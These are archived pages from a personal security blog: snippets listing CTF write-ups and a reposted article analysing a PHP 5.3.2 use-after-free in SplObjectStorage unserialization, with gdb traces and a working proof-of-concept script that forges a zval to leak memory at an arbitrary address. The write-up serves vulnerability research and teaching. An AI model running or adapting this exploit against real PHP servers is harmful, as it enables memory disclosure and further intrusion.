AEROXTEAM.FR (archived pages, via archive-fr.com)

  • Gu1's Website - Posts tagged « csaw »
    Tags: web, writeup. It's fall again and, like every year, many CTFs are happening in those few months. Earlier this week I participated in the hack.lu CTF, a CTF organized by the FluxFingers team as a part of the hack.lu conference in Luxembourg. It was a pretty cool CTF with interesting challenges to solve. I'm not going to do any writeup since there was really nothing interesting

    Original URL path: http://gu1.aeroxteam.fr/tags/csaw/ (2015-12-30)


  • Gu1's Website - Posts tagged « hack.lu »
    Tags: web, writeup. It's fall again and, like every year, many CTFs are happening in those few months. Earlier this week I participated in the hack.lu CTF, a CTF organized by the FluxFingers team as a part of the hack.lu conference in Luxembourg. It was a pretty cool CTF with interesting challenges to solve. I'm not going to do any writeup since there was really nothing interesting

    Original URL path: http://gu1.aeroxteam.fr/tags/hack.lu/ (2015-12-30)

  • Gu1's Website - Posts tagged « web »
    writeup since there was really nothing interesting to say about the challenges I worked on. You can always find writeups on the web if you're interested; there are a few on shell-storm.org. I also participated in the
    0 comments. Read more.
    PlaidCTF 2011 web 300: Django really. By Gu1 on 29/04/2011 at 15:01. Tags: memcached, pctf, plaidctf, web, writeup. Hello! This writeup will

    Original URL path: http://gu1.aeroxteam.fr/tags/web/ (2015-12-30)

  • Gu1's Website - Posts tagged « writeup »
    we solved during PlaidCTF 2011. We had access to a simple guestbook with a form. We tried to trigger a bug, unsuccessfully. At first we thought the vulnerability might be a flaw in CSRF handling, because of the advisory published last February: the app was reacting strangely to the CSRF cookie, re-setting it multiple times, but then the organizers removed the CSRF check altogether. We were stuck at this point until a hint was given: Django's settings file contained a reference to a memcached server. We hadn't tried to
    0 comments. Read more.
    Hackito Ergo Sum 2011. By Gu1 on 12/04/2011 at 22:16. Tags: conference, writeup. Hi! I was at Hackito Ergo Sum 2011 last weekend. I hadn't had the opportunity to write an article about the previous edition of this conference because my blog was more or less dead (closed), so I'll make up for it by telling you about this year's content. The level of the talks was very good and the atmosphere more cosmopolitan than at some other French conferences. The programme is available over there. All the talks looked interesting, even though I missed some, notably the one on DWARF, after going off to pit myself against the
    0 comments. Read more.
    Padocon 2011 Karma 200 using ROP. By Gu1 on 28/01/2011 at 01:17. Tags: buffer overflow, ctf, english, padocon, return oriented programming, writeup. Yet another writeup for the Padocon 2011. This time I'm gonna talk about karma200, a level that we did not validate during the CTF, but I was curious to see how I could exploit it, so I worked on it with Mysterie, kutio, teach and others these last few days. Like for karma100, we had SSH credentials

    Original URL path: http://gu1.aeroxteam.fr/tags/writeup/ (2015-12-30)

  • Gu1's Website - Pwning PHP for fun and chocapicz (repost)
    .../ext/spl/spl_observer.c:141
    141             pelement = spl_object_storage_get(intern, obj TSRMLS_CC);
    (gdb) printzv obj
    [0x086fedb4] (refcount=2) object(stdClass) #2 (0)
    (gdb) printzv inf
    [0x086ffef4] (refcount=1) string(4): "BBBB"
    (gdb) c
    Continuing.
    object(SplObjectStorage)#1 (1) {
      ["storage":"SplObjectStorage":private]=>
      array(1) {
        ["000000006becfaa4000000006c7e449f"]=>
        array(2) {
          ["obj"]=>
          object(stdClass)#2 (0) {
          }
          ["inf"]=>
          string(4) "BBBB"
        }
      }
    }

    Program exited normally.

    So it works. Still in gdb, we are going to check the number of references to "AAAA" after the second call to spl_object_storage_attach():

    (gdb) r -a
    Starting program: /home/gu1/php-5.3.2/sapi/cli/php -a
    [Thread debugging using libthread_db enabled]
    Interactive mode enabled

    php > var_dump(unserialize('C:16:"SplObjectStorage":63:{x:i:2;O:8:"stdClass":0:{},s:4:"AAAA";r:1;,s:4:"BBBB";m:a:0:{}}'));

    Breakpoint 1, spl_object_storage_attach (intern=0x86fec68, obj=0x86fedb4, inf=0x86ffea4) at /home/gu1/php-5.3.2/ext/spl/spl_observer.c:141
    141             pelement = spl_object_storage_get(intern, obj TSRMLS_CC);
    (gdb) c
    Continuing.

    Breakpoint 1, spl_object_storage_attach (intern=0x86fec68, obj=0x86fedb4, inf=0x86ffef4) at /home/gu1/php-5.3.2/ext/spl/spl_observer.c:141
    141             pelement = spl_object_storage_get(intern, obj TSRMLS_CC);
    (gdb) b spl_observer.c:148
    Breakpoint 3 at 0x81c4cb2: file /home/gu1/php-5.3.2/ext/spl/spl_observer.c, line 148.
    (gdb) c
    Continuing.

    Breakpoint 3, spl_object_storage_attach (intern=0x86fec68, obj=0x86fedb4, inf=0x86ffef4) at /home/gu1/php-5.3.2/ext/spl/spl_observer.c:148
    148                     zval_ptr_dtor(&pelement->inf);
    (gdb) printzv pelement->inf
    [0x086ffea4] (refcount=1) string(4): "AAAA"
    (gdb) next
    149                     pelement->inf = inf;
    (gdb) printzv pelement->inf
    [0x086ffea4] (refcount=0) string(4): Cannot access memory at address 0x0
    (gdb) next
    166     }
    (gdb) next
    zim_spl_SplObjectStorage_unserialize (ht=1, return_value=0x86fed98, return_value_ptr=0xbfffbb5c, this_ptr=0x86fdbc8, return_value_used=1) at /home/gu1/php-5.3.2/ext/spl/spl_observer.c:653
    653                     zval_ptr_dtor(&pentry);
    (gdb) ptype var_hash
    type = struct php_unserialize_data {
        void *first;
        void *first_dtor;
    } *
    (gdb) print *(var_entries *)var_hash->first
    $1 = {data = {0x86fedb4, 0x86ffea4, 0x86ffef4, 0x86ffef4, 0x0 <repeats 1020 times>}, used_slots = 4, next = 0x0}

    pelement->inf's reference counter is at 1 and it is decremented by zval_ptr_dtor() (spl_observer.c line 148 above), which means the zval struct and the string it was pointing to ("AAAA") are freed. But we can see, back in SplObjectStorage::unserialize(), that var_hash (the array containing pointers to all variables previously parsed by php_var_unserialize()) still contains a pointer to the old pelement->inf that was just freed. It means we can get a reference to invalid memory using references in our serialized string.

    What can we do with this, you ask? If we control memory allocation to some extent, it should be possible to allocate a fake zval struct at the old address of "AAAA"'s zval struct. This would theoretically allow us to read or write anywhere in memory.

    I should probably talk a bit more about the zval struct before showing you the POC. zval is an essential struct in the PHP interpreter: it is used to represent a PHP variable.

    struct _zval_struct {
        /* Variable information */
        zvalue_value value;      /* value of the variable */
        zend_uint refcount__gc;  /* number of references */
        zend_uchar type;         /* variable type: null, long, double, bool, array, object, string, resource */
        zend_uchar is_ref__gc;   /* boolean, is this a reference? */
    };

    typedef union _zvalue_value {
        long lval;
        double dval;
        struct {
            char *val;
            int len;
        } str;
        HashTable *ht;
        zend_object_value obj;
    } zvalue_value;

    We are going to have to craft a fake zval struct to achieve our evil goal: pwning PHP. Finally, here is a working POC which leaks memory at an arbitrary address:

    <?php
    /*
     * The text in braces is 73 characters long and defines a SplObjectStorage:
     *   C:16:"SplObjectStorage":73:{
     * The SplObjectStorage has 3 entries:
     *   x:i:3;
     * obj: stdClass, inf: "AAAA":
     *   O:8:"stdClass":0:{},s:4:"AAAA";
     * obj: ref to stdClass, inf: "BBBB":
     *   r:1;,s:4:"BBBB";
     * obj: ref to "BBBB", inf: ref to "AAAA":
     *   Note: at this point the ref to "AAAA" is already invalid, since it was freed
     *   when the previous entry was processed.
     *   Note 2: we have to use "R" instead of "r" ("r" should be used for multiple
     *   variables referring to the same instance of a class, and "R" for real
     *   references, with zval.is_ref__gc set to true).
     *   r:3;,R:2;
     * properties of the object (that could have been set manually):
     *   m:a:0:{}
     */

    $fakezval = pack("IIII",  // unsigned integer (machine dependent size and byte order)
        0x08048000,           // this is where the string begins (the address to leak)
        0x0000000f,           // the length of the string
        0x00000000,           // refcount
        0x00000006);          // data type: NULL=0, LONG=1, DOUBLE=2, BOOL=3, ARR=4, OBJ=5, STR=6, RESS=7

    $objst = unserialize('C:16:"SplObjectStorage":73:{x:i:3;O:8:"stdClass":0:{},s:4:"AAAA";r:1;,s:4:"BBBB";r:3;,R:2;m:a:0:{}}');
    $objst->rewind();
    $objst->next(); // we move the internal pointer to the second element in the SplObjectStorage

    for ($i = 0; $i < 5; $i++) {
        $v[$i] = $fakezval.$i; // we repeat the same value several times to overwrite the zval that was freed
    }

    // if you are on Linux, this should print 15 characters (the length field is 0x0f) read at
    // the address 0x08048000, which is generally the beginning of the executable in memory
    echo $objst->getInfo();

    This POC should work out of the box with PHP 5.3.2 (cli, cgi, mod_php), with or without the Suhosin patch applied. Some modifications may be required to make it work with other PHP versions. Here is the output of the script on my computer:

    gu1@0wZd4W0rld:~/php-5.3.2/sapi/cli$ ./php ownz.php | hexdump -C
    00000000  7f 45 4c 46 01 01 01 00  00 00 00 00 00 00 00     |.ELF...........|
    0000000f

    We leaked the beginning of

    Original URL path: http://gu1.aeroxteam.fr/2011/06/15/pwning-php-fun-and-chocapicz-repost/ (2015-12-30)

  • Gu1's Website - Posts tagged « MOPS-2010-061 »
    Tags: repost microblog nibbles, use after free. June 2011. This is an article I originally posted on the nibbles microblog on July 3rd, 2010, but the blog went down permanently a few days ago, so I decided to re-post it here. Thanks again to everyone who contributed to this article (real, myst and others). Hello everyone! Today I'm going to talk about the latest PHP vulnerability discovered by Stefan

    Original URL path: http://gu1.aeroxteam.fr/tags/MOPS-2010-061/ (2015-12-30)

  • Gu1's Website - Posts tagged « php »
    Tags: microblog nibbles, use after free. June 2011. This is an article I originally posted on the nibbles microblog on July 3rd, 2010, but the blog went down permanently a few days ago, so I decided to re-post it here. Thanks again to everyone who contributed to this article (real, myst and others). Hello everyone! Today I'm going to talk about the latest PHP vulnerability discovered by Stefan Esser

    Original URL path: http://gu1.aeroxteam.fr/tags/php/ (2015-12-30)

  • Gu1's Website - Posts tagged « repost microblog nibbles »
    Tags: repost microblog nibbles, use after free. June 2011. This is an article I originally posted on the nibbles microblog on July 3rd, 2010, but the blog went down permanently a few days ago, so I decided to re-post it here. Thanks again to everyone who contributed to this article (real, myst and others). Hello everyone! Today I'm going to talk about the latest PHP vulnerability discovered by Stefan

    Original URL path: http://gu1.aeroxteam.fr/tags/repost%20microblog%20nibbles/ (2015-12-30)